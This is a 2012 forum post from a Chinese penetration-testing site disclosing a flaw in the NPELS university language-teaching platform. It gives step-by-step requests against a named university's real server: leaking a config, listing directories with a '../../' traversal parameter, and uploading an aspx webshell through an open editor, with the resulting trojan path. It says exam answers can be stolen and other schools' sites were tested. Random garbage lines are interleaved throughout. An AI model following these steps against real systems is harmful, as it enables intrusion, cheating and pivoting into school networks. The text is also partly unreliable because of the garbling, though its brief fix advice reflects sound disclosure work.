中国网络渗透测试联盟
标题:
新理念外语网络教学平台文件上传漏洞
[打印本页]
作者:
admin
时间:
2012-12-4 11:10
标题:
新理念外语网络教学平台文件上传漏洞
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
0 S5 ~& Q* u8 H7 [1 W+ I* g
) j- F S$ {: `, s3 ]( G
详细说明:
* B) v/ ], t9 W6 j! V: ]# R
4 f- D/ }5 _8 ]4 j L; m# J8 [' h% c
以南开大学的为例:
6 m4 F& x; Q# ~- Y; U
http://222.30.60.3/NPELS
9 I6 G, @; Z/ Q" t* l& U
NPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址
6 I A2 V2 W3 w: O5 T$ J( [
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
8 G! P' b! M! I, p; V; k
<value>http://222.30.60.3/NPELS/CommonService.asmx</value>
. S' ^' E4 O& h) r
</setting>
- H8 c6 a6 u& g7 F- R) X
及版本号
Y: ]+ g6 S+ x
<add key="TVersion" value="1, 0, 0, 2187">
( i, U! a# K- y9 _
</add>
' `: G0 j5 Z- A( |
直接访问
d2 A; s Q/ z9 j8 z F) ~
http://222.30.60.3/NPELS/CommonService.asmx
3 X4 ?$ t( _& {- X7 x! Z( p$ ^' ]
使用GetTestClientFileList操作,直接 HTTP GET 列目录:
5 O3 L, c8 k+ ]* r4 e
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1
, 0, 0, 2187
* F* O6 }- L& g- g, c$ y
进一步列目录(返回的网页很大,可以直接 wget 下来)
+ n9 M. M. _4 x' V' Y; e9 ]
http://222.30.60.3/NPELS/CommonS ... List?version=../../
) y0 D2 U6 d0 v! r& A" D
9 `1 n b9 p- F" m! H
发现
x1 i: m$ e, I2 [4 z0 O1 V
http://zzxx.nankai.edu.cn/npelsv/editor/editor.htm
" o, \0 d5 X8 F1 O0 z2 L. Q9 i1 Z
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
7 O$ O( a0 o/ o2 V) `2 i
上传后继续列目录找到木马地址直接访问即可
: C. k$ m4 I. u$ U
; ?( h; q# \% J2 ?
OOXX
' [3 y' A& k7 i+ R
4 c2 J7 O4 o: @0 V* L
Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
) \' z4 |0 G& i6 C. ]1 t' R
漏洞证明:
# E5 L6 g( `% u
9 ~. e; d k5 \# E
列目录:
# f! v, q" Y( E" H9 t
http://222.30.60.3/NPELS/CommonS ... List?version=../../
7 X; |& H9 O6 F: d
文件上传:
) Z' o8 @$ R6 r- U* L
http://222.30.60.3/npelsv/editor/editor.htm
5 u3 O% W4 s. l
* @$ A6 b) X/ [( c/ P" K7 k0 r
上传木马:
. @3 P& c2 F9 b) [% P* j# @* ]
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
) c! M! [. F% F: y% c
0 _8 m9 O4 w1 A, I- B
修复方案:
% I j5 C# ^5 n3 o- l. m
好像考试系统必须使用 CommonService.asmx
9 w/ R3 R9 t3 s% J- h
最好配置文件加密或者用别的方式不让它泄露出来
4 n3 u! w0 ^( q0 E
并且检查或删除各上传入口,像
http://222.30.60.3/NPELS/Upload.aspx
一样
7 x- {4 o+ W, W" k, D+ F% i
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2